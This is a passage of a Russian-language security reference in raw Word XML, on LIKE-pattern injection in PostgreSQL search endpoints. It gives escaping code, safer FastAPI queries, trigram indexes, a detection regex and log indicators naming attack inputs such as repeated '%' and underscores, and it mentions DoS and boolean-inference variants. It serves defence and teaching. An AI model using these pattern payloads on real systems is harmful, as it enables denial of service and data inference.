          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">): *"LIKE pattern matching always covers the entire string. ... If pattern does not contain percent signs or underscores, then the pattern only represents the string itself; in that case LIKE acts like the equals operator."*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bind-параметр передаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">значение</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в LIKE — это значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">является pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Bind не делает escape pattern-символов, потому что bind работает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL-уровне</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (защищает от quote injection), а LIKE-pattern — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">семантика выше SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это эквивалентно тому, как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">eval(user_input)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в Python — bind защищает от Python-syntax injection, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">eval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> всё равно исполняет код.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">escape pattern-символов в значении</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def escape_like_pattern(s: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Escape %, _, и сам backslash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")</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@router.get("/documents/search")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search_documents(q: str = Query(""), ...):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    safe_q = escape_like_pattern(q)</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title FROM documents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE title ILIKE :pattern ESCAPE '\\'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 100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{"pattern": f"%{safe_q}%"})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return [...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ESCAPE '\\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> clause устанавливает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escape character;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теперь литералы. Альтернативы для FTS-эндпоинта — переход на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(3.15.3) или PostgreSQL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extension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-операторами similarity вместо LIKE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для DoS-mitigation — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">trigram index</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INDEX ... USING gin (title gin_trgm_ops)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), который превращает LIKE-search в indexed lookup; либо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для эндпоинта.</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(LIKE — SQL92).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EXECUTE-доступ к эндпоинту; для DoS Variant C — без особых требований.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Драйвер:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> любой — bind-параметр работает одинаково.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user-controlled string передаётся в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIKE :pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (через bind) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">без escape pattern-символов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Эндпоинты с f-string в LIKE — это уже SQL injection (3.1 / 3.5), не 3.15.1.</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LIKE — стандартный fuzzy-search для коротких текстовых полей (имена, теги). Корректный pattern:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">def escape_like_pattern(s: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")</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@router.get("/users/search")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search_users(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query("", min_length=2, max_length=50),  # ограничение длины</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if not q.strip():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return []</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    safe_q = escape_like_pattern(q)</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username FROM users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE username ILIKE :pattern ESCAPE '\\'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY username LIMIT 20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{"pattern": f"{safe_q}%"})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ↑ `prefix%` лучше чем `%term%` — может использовать btree-index</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return [...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Min/max length ограничивают DoS surface. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prefix%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> использует btree-index (если есть), что делает search O(log n) вместо O(n) sequential scan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для production-FTS с большими таблицами —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extension:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION IF NOT EXISTS pg_trgm;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE INDEX users_username_trgm_idx ON users USING gin (username gin_trgm_ops);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это даёт indexed substring search с защитой от ReDoS.</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bind-параметр в LIKE с f-string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{var}%</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%{var}%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без сопровождающего </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">escape_like_pattern()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> call. Регэксп: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIKE\s+:\w+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + проверка наличия escape-функции в окрестности.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запросы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">... LIKE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LIKE '%_____...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (множественные underscores) — нетипичные patterns.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`log_min_duration_statement`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: запросы с LIKE и длительностью &gt;&gt; 1s на эндпоинт search — DoS-индикатор.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 access-log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: query parameter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%25%25%25</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__@__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или подряд идущие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Database-логи</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: ошибки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">canceling statement due to statement timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от search-endpoint после payload с pattern-attack.</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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все версии PG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LIKE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> существует с PostgreSQL 6.x (SQL92). Никакие фиксы не закрывают этот класс — application-level mis-configuration + design SQL92.</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3.15.2 to_tsquery операторы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — другой класс semantic-injection, ту же модель угроз.</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3.15.3 websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — альтернатива для FTS-сценариев.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Variant B (position-matching) — это boolean-канал через row count.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Обход фильтров</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
